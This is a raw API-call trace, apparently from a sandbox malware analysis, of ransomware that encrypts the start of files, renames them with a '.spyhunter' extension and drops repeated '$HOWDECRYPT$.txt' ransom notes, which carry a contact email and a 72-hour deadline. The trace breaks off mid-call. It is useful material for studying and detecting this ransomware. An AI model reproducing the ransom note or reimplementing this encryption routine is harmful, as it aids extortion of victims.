(lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql4F48.tmp" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\sql4f48.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.649] GetProcessHeap () returned 0x2c0000 [0145.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0145.649] GetProcessHeap () returned 0x2c0000 [0145.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffbd48 | out: hHeap=0x2c0000) returned 1 [0145.649] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ceea0 | out: pbBuffer=0x25ceea0) returned 1 [0145.649] GetProcessHeap () returned 0x2c0000 [0145.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0145.649] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee98*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee98*=0x30) returned 1 [0145.650] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\sql4EBB.tmp" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\sql4ebb.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.650] GetProcessHeap () returned 0x2c0000 [0145.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0145.650] GetProcessHeap () returned 0x2c0000 [0145.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffbc90 | out: hHeap=0x2c0000) returned 1 [0145.650] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0145.651] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0145.651] WriteFile (in: hFile=0x178, lpBuffer=0x25cedd3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceefc, lpOverlapped=0x0 | out: lpBuffer=0x25cedd3*, lpNumberOfBytesWritten=0x25ceefc*=0x127, lpOverlapped=0x0) returned 1 [0145.652] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0145.652] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceefc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceefc*=0x2ac, lpOverlapped=0x0) returned 1 [0145.652] CloseHandle (hObject=0x178) returned 1 [0145.652] GetProcessHeap () returned 0x2c0000 [0145.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3030790 | out: hHeap=0x2c0000) returned 1 [0145.652] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee98 | out: pbBuffer=0x25cee98) returned 1 [0145.652] GetProcessHeap () returned 0x2c0000 [0145.652] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0145.652] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee90*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee90*=0x30) returned 1 [0145.652] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racwmieventdata.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.652] GetProcessHeap () returned 0x2c0000 [0145.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0145.652] GetProcessHeap () returned 0x2c0000 [0145.653] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef6d48 | out: hHeap=0x2c0000) returned 1 [0145.653] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee98 | out: pbBuffer=0x25cee98) returned 1 [0145.653] GetProcessHeap () returned 0x2c0000 [0145.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0145.653] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee90*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee90*=0x30) returned 1 [0145.653] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0145.653] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat") returned 70 [0145.653] StrStrW (lpFirst="RacWmiDataBookmarks.dat", lpSrch=".txt") returned 0x0 [0145.653] GetProcessHeap () returned 0x2c0000 [0145.653] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0145.653] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cee54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cee54*=0x2800, lpOverlapped=0x0) returned 1 [0145.655] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.655] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cee54, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cee54*=0x2800, lpOverlapped=0x0) returned 1 [0145.655] GetProcessHeap () returned 0x2c0000 [0145.655] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0145.655] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.655] WriteFile (in: hFile=0x178, lpBuffer=0x25cee94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cee54, lpOverlapped=0x0 | out: lpBuffer=0x25cee94*, lpNumberOfBytesWritten=0x25cee54*=0x4, lpOverlapped=0x0) returned 1 [0145.655] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cee54, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cee54*=0x30, lpOverlapped=0x0) returned 1 [0145.655] CloseHandle (hObject=0x178) returned 1 [0145.655] GetProcessHeap () returned 0x2c0000 [0145.655] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0145.655] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat.spyhunter") returned 80 [0145.655] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiDataBookmarks.dat.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racwmidatabookmarks.dat.spyhunter")) returned 1 [0145.656] GetProcessHeap () returned 0x2c0000 [0145.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0145.656] GetProcessHeap () returned 0x2c0000 [0145.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0145.656] GetProcessHeap () returned 0x2c0000 [0145.656] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fef178 | out: hHeap=0x2c0000) returned 1 [0145.656] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee90 | out: pbBuffer=0x25cee90) returned 1 [0145.656] GetProcessHeap () returned 0x2c0000 [0145.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0145.657] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee88*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee88*=0x30) returned 1 [0145.657] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racmetadata.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.657] GetProcessHeap () returned 0x2c0000 [0145.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0145.657] GetProcessHeap () returned 0x2c0000 [0145.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30306c8 | out: hHeap=0x2c0000) returned 1 [0145.657] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee90 | out: pbBuffer=0x25cee90) returned 1 [0145.657] GetProcessHeap () returned 0x2c0000 [0145.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0145.657] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee88*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee88*=0x30) returned 1 [0145.657] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.657] GetProcessHeap () returned 0x2c0000 [0145.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0145.657] GetProcessHeap () returned 0x2c0000 [0145.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3030600 | out: hHeap=0x2c0000) returned 1 [0145.658] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0145.658] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0145.658] WriteFile (in: hFile=0x178, lpBuffer=0x25cedbf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceee8, lpOverlapped=0x0 | out: lpBuffer=0x25cedbf*, lpNumberOfBytesWritten=0x25ceee8*=0x127, lpOverlapped=0x0) returned 1 [0145.661] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0145.661] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceee8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceee8*=0x2ac, lpOverlapped=0x0) returned 1 [0145.661] CloseHandle (hObject=0x178) returned 1 [0145.661] GetProcessHeap () returned 0x2c0000 [0145.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef6c78 | out: hHeap=0x2c0000) returned 1 [0145.661] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee88 | out: pbBuffer=0x25cee88) returned 1 [0145.661] GetProcessHeap () returned 0x2c0000 [0145.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0145.661] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee80*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee80*=0x30) returned 1 [0145.661] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0145.661] GetProcessHeap () returned 0x2c0000 [0145.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0145.661] GetProcessHeap () returned 0x2c0000 [0145.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fef0a0 | out: hHeap=0x2c0000) returned 1 [0145.662] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\rac\\outbound\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0145.662] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0145.662] WriteFile (in: hFile=0x178, lpBuffer=0x25cedb7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceee0, lpOverlapped=0x0 | out: lpBuffer=0x25cedb7*, lpNumberOfBytesWritten=0x25ceee0*=0x127, lpOverlapped=0x0) returned 1 [0145.663] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0145.663] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceee0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceee0*=0x2ac, lpOverlapped=0x0) returned 1 [0145.663] CloseHandle (hObject=0x178) returned 1 [0145.663] GetProcessHeap () returned 0x2c0000 [0145.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3030538 | out: hHeap=0x2c0000) returned 1 [0145.663] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0145.664] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0145.664] WriteFile (in: hFile=0x178, lpBuffer=0x25cedb3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ceedc, lpOverlapped=0x0 | out: lpBuffer=0x25cedb3*, lpNumberOfBytesWritten=0x25ceedc*=0x127, lpOverlapped=0x0) returned 1 [0145.664] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0145.664] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ceedc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ceedc*=0x2ac, lpOverlapped=0x0) returned 1 [0145.665] CloseHandle (hObject=0x178) returned 1 [0145.665] GetProcessHeap () returned 0x2c0000 [0145.665] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f65118 | out: hHeap=0x2c0000) returned 1 [0145.665] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee78 | out: pbBuffer=0x25cee78) returned 1 [0145.665] GetProcessHeap () returned 0x2c0000 [0145.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0145.665] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee70*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee70*=0x30) returned 1 [0145.665] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0145.665] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat") returned 76 [0145.665] StrStrW (lpFirst="tokens.dat", lpSrch=".txt") returned 0x0 [0145.665] GetProcessHeap () returned 0x2c0000 [0145.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0145.665] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cee34, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cee34*=0x2800, lpOverlapped=0x0) returned 1 [0145.691] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0145.691] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cee34, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cee34*=0x2800, lpOverlapped=0x0) returned 1 [0145.692] GetProcessHeap () returned 0x2c0000 [0145.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0145.692] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0145.692] WriteFile (in: hFile=0x178, lpBuffer=0x25cee74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cee34, lpOverlapped=0x0 | out: lpBuffer=0x25cee74*, lpNumberOfBytesWritten=0x25cee34*=0x4, lpOverlapped=0x0) returned 1 [0145.702] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cee34, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cee34*=0x30, lpOverlapped=0x0) returned 1 [0145.702] CloseHandle (hObject=0x178) returned 1 [0145.703] GetProcessHeap () returned 0x2c0000 [0145.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0145.703] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.spyhunter") returned 86 [0145.703] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\tokens.dat"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OfficeSoftwareProtectionPlatform\\tokens.dat.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\officesoftwareprotectionplatform\\tokens.dat.spyhunter")) returned 1 [0145.724] GetProcessHeap () returned 0x2c0000 [0145.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0145.724] GetProcessHeap () returned 0x2c0000 [0145.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0145.725] GetProcessHeap () returned 0x2c0000 [0145.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f31740 | out: hHeap=0x2c0000) returned 1 [0145.725] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cee78 | out: pbBuffer=0x25cee78) returned 1 [0145.725] GetProcessHeap () returned 0x2c0000 [0145.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0145.725] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cee70*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cee70*=0x30) returned 1 [0145.725] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pubwzint.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0145.726] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUBWZINT.REST.trx_dll") returned 77 [0145.726] StrStrW (lpFirst="PUBWZINT.REST.trx_dll", lpSrch=".txt") 